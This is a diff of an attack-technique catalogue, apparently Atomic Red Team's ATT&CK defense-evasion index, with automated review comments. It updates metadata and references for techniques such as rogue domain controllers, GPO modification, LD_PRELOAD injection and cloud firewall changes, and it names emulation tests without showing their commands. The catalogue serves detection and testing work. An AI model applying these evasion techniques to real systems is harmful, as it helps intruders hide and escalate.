- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -12283,7 +12425,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -12343,7 +12484,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests:
- name: Delete all auditd rules using auditctl
@@ -12450,7 +12590,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -12481,8 +12621,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests:
- name: DCShadow (Active Directory)
@@ -12666,7 +12804,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -12690,7 +12828,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests:
- name: Code Signing Policy Modification
@@ -12706,7 +12843,7 @@ defense-evasion:
elevation_required: true
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -12785,7 +12922,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
@@ -12904,7 +13040,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -14641,7 +14776,7 @@ defense-evasion:
elevation_required: true
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -14660,6 +14795,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -14667,7 +14803,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -14687,29 +14822,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
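Review bot: once the external_references reorder is discounted, the substantive edits here are the two URL refreshes (CreateProcess to the learn.microsoft.com processthreadsapi page, WinExec to the learn.microsoft.com winbase page, both with Retrieved September 12, 2024), plus `revoked: false`, the re-added x_mitre_modified_by_ref and the 3.1.0 → 3.2.0 spec bump. The Windows NT Command Shell entry is left on its December 5, 2014 retrieval date and previous-versions URL, so if the intent was a link refresh it is the odd one out; either refresh it in the same pass or note that it was left alone on purpose.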
@@ -14776,7 +14913,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -14843,7 +14979,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests:
- name: Pad Binary to Change Hash - Linux/macOS dd
@@ -14915,7 +15050,7 @@ defense-evasion:
name: sh
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -14951,6 +15086,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -14962,16 +15101,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -15007,12 +15142,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
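Review bot: both harmj0y links move from http://www.harmj0y.net/blog/... to https://blog.harmj0y.net/..., dropping the /blog/ path segment as well as changing scheme and host, so these are new paths rather than an https upgrade; the bumped retrieved dates (September 23, 2024) indicate they were re-checked, which is the right discipline. The adjacent TechNet Group Policy Basics reference keeps its March 5, 2019 retrieval date and blogs.technet.microsoft.com URL; if it still resolves that is fine, otherwise it belongs in the same refresh.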
@@ -15020,9 +15155,8 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
@@ -15078,7 +15212,7 @@ defense-evasion:
elevation_required: true
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -15093,6 +15227,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -15101,18 +15236,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -15144,9 +15279,6 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -15229,7 +15361,7 @@ defense-evasion:
elevation_required: true
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -15350,7 +15482,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -15540,7 +15671,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests:
- name: Clear Logs
@@ -15609,7 +15739,7 @@ defense-evasion:
elevation_required: true
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -15706,7 +15836,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests:
- name: Enable Local and Remote Symbolic Links via fsutil
@@ -15759,7 +15888,7 @@ defense-evasion:
elevation_required: true
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -15791,11 +15920,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -15836,11 +15964,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -15896,7 +16023,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests:
- name: Access Token Manipulation
@@ -15930,7 +16056,7 @@ defense-evasion:
name: powershell
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -15987,7 +16113,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -16238,7 +16363,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -16271,8 +16396,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests:
- name: Odbcconf.exe - Execute Arbitrary DLL
@@ -16338,7 +16461,7 @@ defense-evasion:
name: command_prompt
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -16400,10 +16523,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16461,7 +16583,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -16503,7 +16624,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -16562,41 +16683,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -16605,20 +16695,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
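Review bot: The substantive changes to this object (x_mitre_version '1.1' to '1.2', x_mitre_attack_spec_version 2.1.0 to 3.2.0, and the removal of `x_mitre_permissions_required: - User` and `spec_version: '2.1'`) are hard to spot because the hunk is mostly key reordering: `x_mitre_modified_by_ref` is deleted near the top and re-added at the bottom, and `x_mitre_domains` / `x_mitre_platforms` move without changing value. Having the generator emit keys in a fixed order would keep hunks like this to the real edits. Please also confirm the dropped x_mitre_permissions_required is intentional for T1578.003; other objects in this patch (T1542.002, T1055.002, T1218.005) keep that field in their unchanged context lines.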
@@ -16648,7 +16768,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
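Review bot: The `modified` timestamp moves backwards in this hunk, from '2020-10-27T14:49:39.188Z' to '2020-03-26T19:20:23.030Z', and the same regression appears further down for T1036.002, T1542.002, T1055.004, T1647, T1612, T1055.002, T1218.005, T1564.002, T1562.003 and others. If the old values were locally generated and the new ones are the upstream STIX `modified`, state that in the commit message; otherwise any consumer that sorts or diffs on `modified` will treat these objects as having gone stale.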
@@ -16683,8 +16803,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
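Review bot: This hunk removes `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` from T1574.005 but adds no replacement in the visible lines, whereas the other objects touched in this patch are bumped to 3.2.0 (T1562.006, T1562.007, T1070, T1550.003). Check that T1574.005 still carries an x_mitre_attack_spec_version after the change; the same pattern repeats for T1036.002, T1542.002, T1055.004, T1055.002, T1218.005 and T1205.001 below.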
@@ -16775,7 +16893,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests:
- name: Auditing Configuration Changes on Linux Host
@@ -17001,7 +17118,7 @@ defense-evasion:
elevation_required: true
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -17009,19 +17126,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
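Review bot: The new description string ends with a trailing space before the closing quote at `Denial of Service](https://attack.mitre.org/techniques/T1499). "`. If this mirrors the upstream ATT&CK text, fine, but if the generator normalizes descriptions it should strip it, or the stray space will show up in every future diff of this object. The contributor addition (`- Arun Seelagan, CISA`) and the wording change to "An adversary with appropriate permissions may introduce new firewall rules ... from the cloud control plane to the data plane" look correct and consistent with the version bump in the next hunk.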
@@ -17030,7 +17153,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -17053,9 +17176,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
